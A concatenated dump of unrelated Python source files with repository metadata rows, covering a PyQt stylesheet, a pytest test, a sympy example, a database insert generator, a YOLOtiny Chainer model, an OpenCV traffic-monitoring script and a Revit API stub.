'border-bottom: 2px solid #505050',
'}',
'QMenuBar',
'{',
'background-color: {0:s};'.format(Primary),
'border-width: 1px;',
'border-style: none;',
'border-color: {0:s};'.format(SecondaryDark),
'color: {0:s};'.format(SecondaryText),
'margin: 0px;',
'}',
'QMenuBar::item:selected',
'{',
'background-color: {0:s};'.format(Secondary),
'color: {0:s};'.format(SecondaryText),
'}',
'QMenu',
'{',
'background-color:{0:s};'.format(PrimaryLight),
'border-width: 2px;',
'border-style: solid;',
'border-color: {0:s};'.format(SecondaryDark),
'margin: 0px;',
'}',
'QMenu::separator'
'{',
'height: 2px;'
'background-color: {0:s};'.format(Primary),
'margin: 0px 2px;',
'}',
'QMenu::icon:checked',
'{',
'background-color: {0:s};'.format(Secondary),
'border-width: 1px;',
'border-style: solid;',
'border-color: {0:s};'.format(Primary),
'}',
'QMenu::item',
'{',
'padding: 4px 25px 4px 20px;',
'}',
'QMenu::item:selected',
'{',
'background-color: {0:s};'.format(Secondary),
'color: {0:s};'.format(SecondaryText),
'}',
'QToolBox::tab',
'{',
'background-color: {0:s};'.format(SecondaryLight),
'border: 2px solid #e3e3e3;',
'padding: 5px;',
'}',
'QToolBox::tab:selected',
'{',
'background-color: {0:s};'.format(SecondaryDark),
'color: {0:s};'.format(SecondaryText),
'border: 2px solid #333;',
'}',
'QWidget#page,QWidget#page_2,QWidget#page_3',
'{',
'backgroundcolor:#F0F0F0;',
# 'background-image: url(./assets/background.jpg);',
'}',
'QProgressBar {',
'border: 1px solid rgb(0,0,0);',
'border-radius: 2px;',
'background-color: {0:s};'.format(SecondaryLight),
'}',
'QProgressBar::chunk {',
'border: 1px solid rgb(0,0,0);',
'border-radius: 0px;',
'background-color: {0:s};'.format(SecondaryDark),
'width: 10px;',
'margin: 2px;',
'}',
'QLabel#jLabelPicture',
'{',
'border-width: 2px;',
'border-radius: 0px;',
'border-style: solid;',
'border-color: {0:s};'.format(SecondaryDark),
'}',
'QScrollBar,QScrollBar::add-line,QScrollBar::add-page,QScrollBar::sub-line,QScrollBar::sub-page',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QScrollBar:horizontal',
'{',
'height: 10px;',
'}',
'QScrollBar:vertical',
'{',
'width: 10px;',
'}',
'QScrollBar::handle',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QScrollBar::handle:hover',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QScrollBar::handle:pressed',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
]
app = QtWidgets.QApplication(sys.argv)
loadedFontID = QFontDatabase.addApplicationFont(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets", "Font", "wqy-microhei.ttc"))
print('operating system: ', platform.system())
if platform.system() == 'Windows':
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID("scellseg")
gui = scellsegGui()
app.setStyleSheet('\n'.join(sheet))
gui.show()
sys.exit(app.exec_())
if __name__ == "__main__":
start_gui() | 30.016529 | 116 | 0.499587 | 638 | 7,264 | 5.623824 | 0.299373 | 0.018952 | 0.075808 | 0.119565 | 0.422798 | 0.389911 | 0.316332 | 0.244426 | 0.185619 | 0.129877 | 0 | 0.03596 | 0.318557 | 7,264 | 242 | 117 | 30.016529 | 0.688889 | 0.025055 | 0 | 0.542453 | 1 | 0.004717 | 0.350592 | 0.078104 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014151 | false | 0 | 0.023585 | 0 | 0.042453 | 0.004717 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d33d05aa2036a3db33dfe5549b91f4bc1ae6e12f | 770 | py | Python | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 115 | 2017-11-08T02:24:31.000Z | 2022-02-10T19:03:57.000Z | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 511 | 2017-12-05T15:23:09.000Z | 2022-02-22T19:38:43.000Z | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 35 | 2017-11-30T13:36:28.000Z | 2022-01-10T18:11:06.000Z | # coding: utf-8
from pathlib import Path
import pytest
from AxonDeepSeg.visualization.visualize import visualize_training
class TestCore(object):
def setup(self):
# Get the directory where this current file is saved
self.fullPath = Path(__file__).resolve().parent
# Move up to the test directory, "test/"
self.testPath = self.fullPath.parent
self.pathModel = (
self.testPath /
'__test_files__' /
'__test_model__' /
'Model'
)
def teardown(self):
pass
# --------------visualize_training tests-------------- #
@pytest.mark.unit
def test_visualize_training_runs_successfully(self):
assert visualize_training(str(self.pathModel))
| 24.0625 | 66 | 0.615584 | 81 | 770 | 5.592593 | 0.580247 | 0.15011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001783 | 0.271429 | 770 | 31 | 67 | 24.83871 | 0.805704 | 0.202597 | 0 | 0 | 0 | 0 | 0.054366 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 1 | 0.166667 | false | 0.055556 | 0.166667 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d33de8c495b1c5d04c26434bb941307d1b085eba | 441 | py | Python | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | from normal_forms import normal_form
import sympy
# Murdock, Normal Forms and Unfoldings of Local Dynamical Systems, Example 4.5.24
def f(x, y, z):
f1 = 6 * x + x**2 + x * y + x * z + y**2 + y * z + z**2
f2 = 2 * y + x**2 + x * y + x * z + y**2 + y * z + z**2
f3 = 3 * z + x**2 + x * y + x * z + y**2 + y * z + z**2
return f1, f2, f3
h = normal_form(f, (0, 0, 0), 2)
# coeff of z**2
print h.fun[0].coeff(h.jet.var[2]**2)
| 27.5625 | 81 | 0.512472 | 97 | 441 | 2.298969 | 0.371134 | 0.035874 | 0.040359 | 0.053812 | 0.161435 | 0.161435 | 0.161435 | 0.161435 | 0.161435 | 0.161435 | 0 | 0.095847 | 0.290249 | 441 | 15 | 82 | 29.4 | 0.616613 | 0.210884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.222222 | null | null | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d34b8ae8f80579fd68134d835709ce8d49d3681c | 1,822 | py | Python | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | 1 | 2018-04-04T09:26:21.000Z | 2018-04-04T09:26:21.000Z | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | null | null | null | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | null | null | null | #-*-coding:utf-8-*-
#bodyBMI.py
#2018年4月11日 21:03:12
#打印出字符串中的某一部分
'''
import random
st = [1,1,15,1,5,8,1,5,8]
print (random.shuffle(st))
'''
'''
#利用蒙特卡洛方法计算圆周率PI
from random import random
from time import perf_counter
DATA = pow(1000,100)
hit = 0
start = perf_counter()
for i in range(1,DATA+1):
x,y = random(),random()
if pow((x**2)+(y**2),0.5)<=1:
hit+=1
PI = 4*(hit/DATA)
print("圆周率PI={}".format(PI))
print("程序运行时间={}".format(start-perf_counter()))
'''
'''
#利用函数定义计算N的阶乘
n = 10
sr = [1,2,5,23,92,14,20,1]
def fact(m=1):
global n
for i in range(1,n):
n*=i
return n//m
print(fact())
print("最大的是:{}\n最小的是:{}".format(max(sr),min(sr)))
'''
'''
#前期复习
sr = ['sa','ad']
print(''.join(sr))
'''
'''
#海龟进度条
import time
import turtle as t
t.setup(600,600,200,200)
t.pensize(12)
t.pencolor('red')
t.bk(100)
t.done()
'''
'''
try:
st = str(input())
print(st)
except:
print("error!")
else:
print("right")
finally:
print("end")
'''
'''
for i in range(1,10+1):
if i==8:
continue
print(i)
print('xx')
'''
#第五周函数学习
#可变参数学习
'''
def fact(n,*b):
s = 1
for i in range (1,n):
s+=i
for iteam in b:
s*=iteam
return s
print (fact(10,2,3,4))
'''
'''
s = 10
def fact(n,*b):
global s
for i in range (1,n):
s+=i
for iteam in b:
s*=iteam
return s,b
a,b = fact(10,2,3,4)
print (a,b)
'''
#局部变量为组合数据类型,且为创建,等同于全局变量。
'''
#eg1
ls = ['d','f']
def func(a):
ls.append(a)
return
func('c')
print(ls)
#eg2
ls = ['d','f']
def func(a):
ls = [] #重新定义了ls,使它被创建成为了局部变量。
ls.append(a)
return
func('c')
print(ls)
'''
'''
dc =lambda a,b : a+b=1 #错误写法,不能赋值
print(dc(10,12))
dc = lambda a,b : a+b #正确方式
print(dc(10,12))
'''
'''
#无参数值的。
dc = lambda :"武汉大学" #其中不能有打印函数
print(dc())
'''
| 12.565517 | 53 | 0.540615 | 314 | 1,822 | 3.130573 | 0.369427 | 0.012208 | 0.030519 | 0.055951 | 0.241099 | 0.198372 | 0.160732 | 0.134283 | 0.079349 | 0.079349 | 0 | 0.07431 | 0.224479 | 1,822 | 144 | 54 | 12.652778 | 0.620665 | 0.053238 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 0 | null | null | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d34d9ab7f21732e1b05d7bd300bd84ebde6c1a49 | 8,421 | py | Python | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | 1 | 2016-09-25T16:41:57.000Z | 2016-09-25T16:41:57.000Z | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | null | null | null | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | 2 | 2016-09-25T16:48:49.000Z | 2020-05-26T20:00:33.000Z | #!/usr/local/bin/bash
"""
Two options:
1) Build DB-specific data files from meta-data files
2) Build a single file containing all the DB-specific 'insert' statements in the correct dependency
order from meta-data files and XML table files
NOTE:
- The data files must be named "xxx.dat"; for option (2) the corresponding XML table file must be
"xxx.sql"
- For option (2), the data must be tab-separated
$Header: /home/inqwell/cvsroot/dev/scripts/python/meta_to_db_data.py,v 1.1 2009/05/22 22:15:44 sanderst Exp $
$Author: sanderst $
$DateTime: 2009/05/01 17:04:46 $
$Change: 165582 $
"""
import xml.etree.ElementTree as ET
from xml_to_db_utils import get_table_info
from xml_to_db_utils import get_table_creation_order
import xml_to_mysql_utils
import xml_to_oracle_utils
# Mapping from DB type to function taking a Xylinq name and returning its DB-compatible name
_name_func_by_db_type = {
"mysql" : xml_to_mysql_utils.get_db_compatible_name,
"oracle": xml_to_oracle_utils.get_db_compatible_name,
}
# Mapping from DB type to meta-data converter class
_meta_data_converter_cls_by_db_type = {
"mysql" : xml_to_mysql_utils.MetaDataConverter,
"oracle": xml_to_oracle_utils.MetaDataConverter,
}
def meta_data_text_to_db_data_text(meta_data_text, db_type):
"""
Convert a meta-data text into a DB-specific data text.
@param IN meta_data_text Meta-data text
@param IN db_type DB type (MySQL, Oracle, ...)
@return A DB-specific data text
"""
# Get the DB-specific meta-data converter class
try:
meta_data_converter = _meta_data_converter_cls_by_db_type[db_type.lower()]()
except KeyError:
raise Exception("DB type not supported: '%s'" % db_type)
# Convert the meta-data in the data text
db_data_text = meta_data_converter.meta_to_db_text(meta_data_text)
return db_data_text
def meta_data_to_db_insert_text(info_and_data_list, db_type, db_statement_sep=None):
"""
Convert a list of meta-data texts (along with table info objects) into a text containing insert
statement for a given database.
@param IN info_and_data_list List of TableInfo object and meta-data text pairs
@param IN db_type DB type (MySQL, Oracle, ...)
@param IN db_statement_sep Separator to use for the insert statements; default: ";"
@return The insert statements as a string
"""
if db_statement_sep is None:
db_statement_sep = ";"
# Get the DB-specific functions/classes
try:
xy_to_db_name_func = _name_func_by_db_type[db_type.lower()]
meta_data_converter = _meta_data_converter_cls_by_db_type[db_type.lower()]()
except KeyError:
raise Exception("DB type not supported: '%s'" % db_type)
# Identify the order of insertion
info_and_data_by_table_name = dict([(item[0].name, item) for item in info_and_data_list])
table_info_list = [item[0] for item in info_and_data_list]
table_order = get_table_creation_order(table_info_list)
# Process each table in the insertion order
output_lines = []
for table_name in table_order:
table_info, meta_data_text = info_and_data_by_table_name[table_name]
# Convert the meta-data in the data text
db_data_text = meta_data_converter.meta_to_db_text(meta_data_text)
# Get the DB table and column names
db_table_name = xy_to_db_name_func(table_name)
db_col_names = [xy_to_db_name_func(col_info.name) for col_info in table_info.columns]
db_col_list_str = ", ".join(db_col_names)
nb_col_names = len(db_col_names)
# Process the data rows
rows = db_data_text.splitlines()
for row in rows:
row = row.strip()
if not row or row.startswith("//"):
continue
values = row.split("\t")
if len(values) != nb_col_names:
raise Exception("Incorrect number of values (%d expected):\n%s" % (nb_col_names,
values))
insert_statement = "INSERT INTO %s (%s) VALUES (%s)%s" % (
db_table_name,
db_col_list_str,
", ".join(values),
db_statement_sep)
output_lines.append(insert_statement)
return "\n".join(output_lines)
def main():
import glob
from optparse import OptionParser
import os
parser = OptionParser()
parser.add_option("--mode", dest="mode", help="'data_files' or 'insert_file'")
parser.add_option("--meta_data_dir", dest="meta_data_dir", help="Input directory for meta-data "
"files")
parser.add_option("--xml_dirs", dest="xml_dirs", help="Input directories for XML table files; "
"'insert_file' mode only")
parser.add_option("--out_dir", dest="output_dir", help="Output dir for data files; 'data_files'"
" mode only")
parser.add_option("--out", dest="output_file", help="Output file for insert statements; "
"'insert_file' mode only")
parser.add_option("--db", dest="db_type", help="DB type: MySQL, Oracle, ...")
parser.add_option("--sep", dest="db_statement_sep", help="Separator for the insert statements; "
"'insert_file' mode only")
options, dummy = parser.parse_args()
mode = options.mode
if mode is None:
raise Exception("Missing mandatory argument '--mode'")
meta_data_dir = options.meta_data_dir
if meta_data_dir is None:
raise Exception("Missing mandatory argument '--meta_data_dir'")
db_type = options.db_type
if db_type is None:
raise Exception("Missing mandatory argument '--db'")
if mode == "data_files":
output_dir = options.output_dir
if output_dir is None:
raise Exception("Missing mandatory argument '--out_dir'")
meta_data_files = glob.glob(os.path.join(meta_data_dir, "*.dat"))
for meta_data_file in meta_data_files:
print "Processing meta-data file %s" % meta_data_file
# Read the data file
fh = open(meta_data_file)
try:
meta_data_text = fh.read()
finally:
fh.close()
# Convert the meta-data into DB-specific data
db_data_text = meta_data_text_to_db_data_text(meta_data_text, db_type)
# Build the DB-specific data file
db_data_file = os.path.join(output_dir, os.path.basename(meta_data_file))
fh = open(db_data_file, "w")
try:
fh.write(db_data_text)
finally:
fh.close()
elif mode == "insert_file":
xml_dir_list = options.xml_dirs
if xml_dir_list is None:
raise Exception("Missing mandatory argument '--xml_dirs'")
xml_dir_list = [item.strip() for item in xml_dir_list.split(",")]
output_file = options.output_file
if output_file is None:
raise Exception("Missing mandatory argument '--out'")
db_statement_sep = options.db_statement_sep
if db_statement_sep:
db_statement_sep = db_statement_sep.replace("\\n", "\n")
info_and_data_list = []
meta_data_files = glob.glob(os.path.join(meta_data_dir, "*.dat"))
for meta_data_file in meta_data_files:
# Read the corresponding XML table file
for xml_dir in xml_dir_list:
xml_file = os.path.join(xml_dir, "%s.xml" %
os.path.splitext(os.path.basename(meta_data_file))[0])
if os.path.exists(xml_file):
break
else:
raise Exception("No XML table file found for meta-data file %s" % meta_data_file)
table_elt_tree = ET.parse(xml_file)
table_elt = table_elt_tree.getroot()
table_info = get_table_info(table_elt)
# Read the data file
fh = open(meta_data_file)
try:
meta_data_text = fh.read()
finally:
fh.close()
info_and_data_list.append((table_info, meta_data_text))
output_text = meta_data_to_db_insert_text(info_and_data_list, db_type, db_statement_sep)
fh = open(output_file, mode="w")
try:
fh.write(output_text)
finally:
fh.close()
else:
raise Exception("Unknown mode: '%s'" % mode)
if __name__ == "__main__":
main()
| 37.426667 | 109 | 0.652535 | 1,213 | 8,421 | 4.224237 | 0.173124 | 0.084309 | 0.032787 | 0.020492 | 0.42096 | 0.343091 | 0.295082 | 0.242779 | 0.169009 | 0.169009 | 0 | 0.006845 | 0.254008 | 8,421 | 224 | 110 | 37.59375 | 0.808819 | 0.071844 | 0 | 0.248227 | 0 | 0 | 0.147907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.056738 | null | null | 0.007092 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d34dea71189d3afc7d4964aa6dbd49339356c594 | 3,806 | py | Python | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | 9 | 2016-12-22T00:49:45.000Z | 2020-02-09T02:02:25.000Z | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | null | null | null | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import numpy as np
import chainer
from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils
from chainer import Link, Chain, ChainList
import chainer.functions as F
import chainer.links as L
from chainer import training
from chainer.training import extensions
def darknetConv2D(in_channel,out_channel, bn=True):
if (bn):
return Chain(
c = L.Convolution2D(in_channel,out_channel, ksize=3, pad=1,nobias=True),
n = L.BatchNormalization(out_channel,use_beta=False,eps=0.000001),
b = L.Bias(shape=[out_channel,]),
)
else:
return Chain(
c = L.Convolution2D(in_channel,out_channel, ksize=3, pad=1,nobias=True),
b = L.Bias(shape=[out_channel,]),
)
def CRP(c, h, stride=2, pooling=True):
# convolution -> leakyReLU -> MaxPooling
h = c.b( c.n( c.c(h),test=True))
h = F.leaky_relu(h,slope=0.1)
if pooling:
h = F.max_pooling_2d(h,ksize=2,stride=stride,pad=0)
return h
class YOLOtiny(Chain):
def __init__(self):
super(YOLOtiny, self).__init__(
c1 = darknetConv2D(3,16),
c2 = darknetConv2D(None,32),
c3 = darknetConv2D(None,64),
c4 = darknetConv2D(None,128),
c5 = darknetConv2D(None,256),
c6 = darknetConv2D(None,256),
c7 = darknetConv2D(None,512),
c8 = darknetConv2D(None,512),
c9 = darknetConv2D(None,35,bn=False)
)
def __call__(self,x):
return self.predict(x)
def predict(self,x):
h = CRP(self.c1, x)
h = CRP(self.c2, h)
h = CRP(self.c3, h)
h = CRP(self.c4, h)
h = CRP(self.c5, h)
h = CRP(self.c6, h, stride=1)
h = F.get_item(h,(slice(None),slice(None),slice(1,14),slice(1,14))) # x[:,:,0:13,0:13]
h = CRP(self.c7, h, pooling=False)
h = CRP(self.c8, h, pooling=False)
h = self.c9.b( self.c9.c(h)) # no leaky relu, no BN
return h
def loadCoef(self,filename):
print "loading",filename
file = open(filename,"rb")
dat=np.fromfile(file,dtype=np.float32)[4:] # skip header(4xint)
layers=[ [3,16],[16,32], [32,64], [64,128],[128,256],[256,256],[256,512],[512,512]]
offset=0
for i,l in enumerate(layers):
in_ch=l[0]
out_ch=l[1]
# load bias
txt= "self.c%d.b.b.data = dat[%d:%d]" % (i+1, offset, offset+out_ch)
offset+=out_ch
exec(txt)
# load bn
txt= "self.c%d.n.gamma.data = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c%d.n.avg_mean = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c%d.n.avg_var = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
# load convolution weight
txt= "self.c%d.c.W.data = dat[%d:%d].reshape(%d,%d,3,3)" % (i+1, offset, offset+(out_ch*in_ch*9), out_ch,in_ch)
offset+= (out_ch*in_ch*9)
exec(txt)
print offset
# load last convolution weight
in_ch=512
out_ch=35
txt= "self.c9.b.b.data = dat[%d:%d]" % ( offset, offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c9.c.W.data = dat[%d:%d].reshape(%d,%d,1,1)" % ( offset, offset+out_ch*in_ch*1, out_ch,in_ch)
offset+=out_ch*in_ch*1
exec(txt)
print offset
if __name__ == '__main__':
c=YOLOtiny()
im=np.zeros((1,3,416,416),dtype=np.float32)
c.predict(im)
c.loadCoef("tiny-yolo-ppap_final.weights")
serializers.save_npz('YOLOtiny_v2.model',c)
| 31.716667 | 123 | 0.558329 | 575 | 3,806 | 3.58087 | 0.25913 | 0.043711 | 0.074794 | 0.057795 | 0.283633 | 0.278776 | 0.249636 | 0.228266 | 0.228266 | 0.185527 | 0 | 0.059926 | 0.285339 | 3,806 | 119 | 124 | 31.983193 | 0.697059 | 0.049133 | 0 | 0.236559 | 0 | 0.021505 | 0.087258 | 0.02964 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.086022 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3529efe0bf0d6df5975b82e93a399f8498bfad6 | 4,091 | py | Python | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | import os
import cv2
import numpy as np
import time
from backgroundsubtraction.KMeans import KMeans
from objectblob.ObjectBlobDetection import ObjectBlobDetection
from pixelcleaning.MorphologicalCleaning import MorphologicalCleaning
__author__ = 'Luqman'
def morphological(image):
cleaning_model = MorphologicalCleaning()
return cleaning_model
def test(algorithm, vid_src, file_name):
_, frame = vid_src.read()
used_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
model = KMeans(used_frame, 3)
cleaning_model = algorithm(used_frame)
blob_detection = ObjectBlobDetection(used_frame)
n_frame = 0
image_resolution = (0, 0)
min_fps = -1
max_fps = -1
mean_fps = -1
real_fps = vid_src.get(cv2.cv.CV_CAP_PROP_FPS)
# vid_src.get(cv2.CV_CAP_PROP_FPS)
if not os.path.exists("saved_images/"+file_name):
os.makedirs("saved_images/"+file_name)
os.makedirs("saved_images/"+file_name+"/normal")
os.makedirs("saved_images/"+file_name+"/fg")
os.makedirs("saved_images/"+file_name+"/grayscale")
os.makedirs("saved_images/"+file_name+"/clean")
os.makedirs("saved_images/"+file_name+"/contour")
# applying background detection
while frame is not None:
time_start = time.time()
n_frame += 1
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/normal/"+repr(n_frame)+".jpg", frame)
used_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
y, x = used_frame.shape
image_resolution = x, y
fg = model.apply(used_frame)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/fg/"+repr(n_frame)+".jpg", fg)
# cv2.imwrite("saved_images/"+file_name+"/grayscale/"+repr(n_frame)+".jpg", used_frame)
fg_use = np.copy(fg)
fg_clean = cleaning_model.apply(fg)
fg_clean_use = np.copy(fg_clean)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/clean/"+repr(n_frame)+".jpg", fg_clean)
# contours
blob_detection.get_contours(fg_clean_use, used_frame)
# cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)
frame_with_contours = blob_detection.draw_blobs(frame)
# print len(contours)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/contour/"+repr(n_frame)+".jpg", frame_with_contours)
time_end = time.time()
cv2.imshow('img', frame_with_contours)
cv2.imshow('fg', fg)
cv2.imshow('fg_clean', fg_clean)
# prev_frame = np.copy(frame)
_, frame = vid_src.read()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
time_process = time_end - time_start
cur_fps = 0
if time_process > 0:
cur_fps = 1. / time_process
# set max / min / mean fps
if (cur_fps > max_fps) or (max_fps == -1):
max_fps = cur_fps
if (cur_fps < min_fps) or (min_fps == -1):
min_fps = cur_fps
if mean_fps == -1:
mean_fps = cur_fps
else:
mean_fps = (0.98 * mean_fps) + (0.02 * cur_fps)
print "--- run statistics ---"
print "image resolution: ", image_resolution
print "total frame: ", n_frame
print "min FPS: ", min_fps
print "max FPS: ", max_fps
print "average FPS: ", mean_fps
print "Video FPS: ", real_fps
if __name__ == '__main__':
import sys
if len(sys.argv) >= 2:
video_src_file = sys.argv[1]
if len(sys.argv) >= 3:
exp_file_name = sys.argv[2]
else:
exp_file_name = "default"
else:
video_src_file = 0
exp_file_name = "default"
# run video
vid = cv2.VideoCapture(video_src_file)
test(morphological, vid, exp_file_name)
| 29.431655 | 106 | 0.611831 | 537 | 4,091 | 4.383613 | 0.221601 | 0.057774 | 0.076466 | 0.096856 | 0.322005 | 0.269329 | 0.193288 | 0.193288 | 0.158454 | 0.158454 | 0 | 0.022059 | 0.268638 | 4,091 | 138 | 107 | 29.644928 | 0.764706 | 0.215106 | 0 | 0.111111 | 0 | 0 | 0.082261 | 0 | 0 | 0 | 0.001256 | 0 | 0 | 0 | null | null | 0 | 0.098765 | null | null | 0.08642 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d35417a4cf00badf31eab6d25dadb13c434cb246 | 1,176 | py | Python | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class NamingUtils(object):
""" A collection of utilities related to element naming. """
@staticmethod
def CompareNames(nameA, nameB):
"""
CompareNames(nameA: str,nameB: str) -> int
Compares two object name strings using Revit's comparison rules.
nameA: The first object name to compare.
nameB: The second object name to compare.
Returns: An integer indicating the result of the lexical comparison between the two
names.
Less than zero if nameA comes before nameB in the ordering,zero if
nameA and nameB are equivalent,
and greater than zero if nameA is comes
after nameB in the ordering.
"""
pass
@staticmethod
def IsValidName(string):
"""
IsValidName(string: str) -> bool
Identifies if the input string is valid for use as an object name in Revit.
string: The name to validate.
Returns: True if the name is valid for use as a name in Revit,false if it contains
prohibited characters and is invalid.
"""
pass
__all__ = [
"CompareNames",
"IsValidName",
]
